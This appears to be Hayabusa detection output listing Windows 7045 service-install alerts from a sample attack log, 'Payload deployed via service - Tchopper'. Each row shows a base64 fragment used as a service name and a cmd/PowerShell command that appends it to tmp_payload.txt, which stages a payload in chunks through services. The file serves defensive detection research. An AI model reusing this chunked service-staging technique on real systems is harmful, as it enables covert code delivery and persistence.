b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 